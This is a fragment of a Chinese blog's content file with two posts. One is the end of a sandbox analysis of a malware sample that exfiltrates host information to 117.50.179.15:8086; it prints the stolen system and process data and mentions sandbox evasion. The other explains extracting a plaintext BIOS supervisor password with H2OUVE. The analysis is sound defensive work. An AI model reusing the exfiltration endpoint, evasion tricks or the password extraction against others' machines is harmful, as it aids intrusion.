src=\"/../img/TBSandbox-Day2/image-20240407131236283.png\"></p>\n<p>凌晨两点,这小哥真的不睡觉的吗 功能变化不大,似乎与V1.2.0版本差不多,除了新增一个打开计算器</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240407131407965.png\"></p>\n<p>信息发送至<code>117.50.179.15:8086</code></p>\n<figure class=\"highlight yaml\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br><span class=\"line\">40</span><br><span class=\"line\">41</span><br><span class=\"line\">42</span><br><span class=\"line\">43</span><br><span class=\"line\">44</span><br><span class=\"line\">45</span><br><span class=\"line\">46</span><br><span class=\"line\">47</span><br><span class=\"line\">48</span><br><span class=\"line\">49</span><br><span class=\"line\">50</span><br><span class=\"line\">51</span><br><span class=\"line\">52</span><br><span class=\"line\">53</span><br><span class=\"line\">54</span><br><span class=\"line\">55</span><br><span class=\"line\">56</span><br><span class=\"line\">57</span><br><span class=\"line\">58</span><br><span class=\"line\">59</span><br><span class=\"line\">60</span><br><span class=\"line\">61</span><br><span class=\"line\">62</span><br><span class=\"line\">63</span><br><span class=\"line\">64</span><br><span class=\"line\">65</span><br><span class=\"line\">66</span><br><span class=\"line\">67</span><br><span class=\"line\">68</span><br><span class=\"line\">69</span><br><span class=\"line\">70</span><br><span class=\"line\">71</span><br><span class=\"line\">72</span><br><span class=\"line\">73</span><br><span class=\"line\">74</span><br><span class=\"line\">75</span><br><span class=\"line\">76</span><br><span class=\"line\">77</span><br><span class=\"line\">78</span><br><span class=\"line\">79</span><br><span class=\"line\">80</span><br><span class=\"line\">81</span><br><span class=\"line\">82</span><br><span class=\"line\">83</span><br><span class=\"line\">84</span><br><span class=\"line\">85</span><br><span class=\"line\">86</span><br><span class=\"line\">87</span><br><span class=\"line\">88</span><br><span class=\"line\">89</span><br><span class=\"line\">90</span><br><span class=\"line\">91</span><br><span class=\"line\">92</span><br><span class=\"line\">93</span><br><span class=\"line\">94</span><br><span class=\"line\">95</span><br><span class=\"line\">96</span><br><span class=\"line\">97</span><br><span class=\"line\">98</span><br><span class=\"line\">99</span><br><span class=\"line\">100</span><br><span class=\"line\">101</span><br><span class=\"line\">102</span><br><span class=\"line\">103</span><br><span class=\"line\">104</span><br><span class=\"line\">105</span><br><span class=\"line\">106</span><br><span class=\"line\">107</span><br><span class=\"line\">108</span><br><span class=\"line\">109</span><br><span class=\"line\">110</span><br><span class=\"line\">111</span><br><span class=\"line\">112</span><br><span class=\"line\">113</span><br><span class=\"line\">114</span><br><span class=\"line\">115</span><br><span class=\"line\">116</span><br><span class=\"line\">117</span><br><span class=\"line\">118</span><br><span class=\"line\">119</span><br><span class=\"line\">120</span><br><span class=\"line\">121</span><br><span class=\"line\">122</span><br><span class=\"line\">123</span><br><span class=\"line\">124</span><br><span class=\"line\">125</span><br><span class=\"line\">126</span><br><span class=\"line\">127</span><br><span class=\"line\">128</span><br><span class=\"line\">129</span><br><span class=\"line\">130</span><br><span class=\"line\">131</span><br><span class=\"line\">132</span><br><span class=\"line\">133</span><br><span class=\"line\">134</span><br><span class=\"line\">135</span><br><span class=\"line\">136</span><br><span class=\"line\">137</span><br><span class=\"line\">138</span><br><span class=\"line\">139</span><br><span class=\"line\">140</span><br><span class=\"line\">141</span><br><span class=\"line\">142</span><br><span class=\"line\">143</span><br><span class=\"line\">144</span><br><span class=\"line\">145</span><br><span class=\"line\">146</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs yaml\"><span class=\"hljs-string\">systemInfo=Computer</span> <span class=\"hljs-attr\">Name:</span> <span class=\"hljs-string\">DESKTOP-H9URB7T,</span> <span class=\"hljs-attr\">CPU Cores:</span> <span class=\"hljs-number\">4</span><span class=\"hljs-string\">,</span> <span class=\"hljs-attr\">Hard Drives:</span> <span class=\"hljs-number\">2</span><br><span class=\"hljs-attr\">Directory Contents:</span> <br><span class=\"hljs-string\">desktop.ini</span><br><span class=\"hljs-string\">Microsoft</span> <span class=\"hljs-string\">Edge.lnk</span><br><br><span class=\"hljs-attr\">WinSAT:</span> <br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.25</span><span class=\"hljs-number\">.993</span><span class=\"hljs-string\">.winsat.etl</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Cpu.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Disk.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">DWM.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Graphics3D.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Mem.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.08</span><span class=\"hljs-number\">.10</span><span class=\"hljs-number\">.544</span> <span class=\"hljs-string\">Formal.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><br><span class=\"hljs-string\">网卡信息:</span><br><span class=\"hljs-string\">Realtek</span> <span class=\"hljs-string\">RTL8139C+</span> <span class=\"hljs-string\">Fast</span> <span class=\"hljs-string\">Ethernet</span> <span class=\"hljs-string\">NIC</span><br><br><span class=\"hljs-string\">开启窗口数量:</span><br><span class=\"hljs-number\">6</span><br><span class=\"hljs-attr\">Process Name:</span> [<span class=\"hljs-string\">System</span> <span class=\"hljs-string\">Process</span>]<span class=\"hljs-string\">,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">0</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">System,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Registry,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">96</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">smss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">324</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">csrss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">444</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">wininit.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">520</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">csrss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">568</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">winlogon.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">620</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">services.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">660</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">lsass.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">684</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">796</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">820</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">fontdrvhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">840</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">fontdrvhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">848</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">940</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">992</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">dwm.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">348</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">360</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">696</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1060</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1072</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1108</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1184</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1232</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1272</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1280</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1312</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1320</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1412</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1440</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1464</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1500</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1536</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1564</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1656</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1756</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1824</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1840</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">audiodg.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1980</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1992</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2044</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1192</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1432</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">spoolsv.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2148</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2244</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2276</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2476</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2484</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2492</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">AcrylicService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2500</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2536</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2564</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2580</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2592</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2752</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3020</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2412</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3084</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sihost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3324</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3488</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ctfmon.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3520</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3576</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">explorer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3792</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sppsvc.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3916</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3984</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4060</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ChsIME.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4080</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SppExtComObj.Exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3956</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">StartMenuExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4120</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4128</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4160</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4248</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4368</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ApplicationFrameHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4672</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdge.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4692</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">browser_broker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4816</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4892</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">dllhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4972</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Windows.WARP.JITService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4984</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5088</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdgeSH.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4428</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdgeCP.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4460</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5264</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5536</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5960</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6120</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4916</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">TrustedInstaller.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5644</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">TiWorker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5500</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2600</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4744</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6076</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5992</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3940</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5592</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MjUVfuNpXl.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1348</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">unsecapp.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2896</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Detonate.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1372</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1260</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">GoogleUpdateSetup.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5244</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">clamd.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1612</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1684</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2552</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RemindersServer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2432</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">backgroundTaskHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1936</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">UniversalAVService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4196</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">audiodg.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1424</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">EverythingServer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4336</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WUDFHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4840</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">GoogleUpdate.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5892</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3236</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sihost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5200</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5192</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">QQ.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2720</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ShellExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3244</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">BackgroundTransferHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5520</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5104</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ShellExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2548</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4240</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5928</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SandboxCheck.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">448</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">conhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2272</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4348</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">calc.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">464</span><br><br></code></pre></td></tr></table></figure>\n\n\n\n\n\n<h2 id=\"END\"><a href=\"#END\" class=\"headerlink\" title=\"END\"></a>END</h2><p>就此似乎结束了 他没有更新新的东西</p>\n<p>他似乎发现了绕过微步的小技巧,但是总感觉这个技巧有点灵车)</p>\n"},{"title":"红米Redmibook 16 Bios密码找回","date":"2023-08-19T11:01:34.000Z","_content":"\n# 红米Redmibook 16 Bios密码找回\n\n只能说这是一个困扰了我很久的问题，之前给bios随手设置了一个密码但是想不起来密码是什么了。所以才有了这篇踩坑日志。\n\n[H2O工具包下载](https://cloud.lenxy.net/s/jRfM)\n\n## 提取BIOS\n\n> :exclamation: 注: 使用前请执行WDFInst.exe 来初始化 \n\n使用H2OUVE对当前运行的bios进行提取\n\n![](../img/image-20230819192523604.png)\n\n## 查找密码\n\n点击Variable 找到SystemSupervisorPW 查看明文密码（对 bios里保存的是明文密码\n\n![](../img/image-20230819193340169.png)\n","source":"_posts/redmibook-password.md","raw":"---\ntitle: 红米Redmibook 16 Bios密码找回\ndate: 2023-08-19 19:01:34\ntags: 踩坑日志\n---\n\n# 红米Redmibook 16 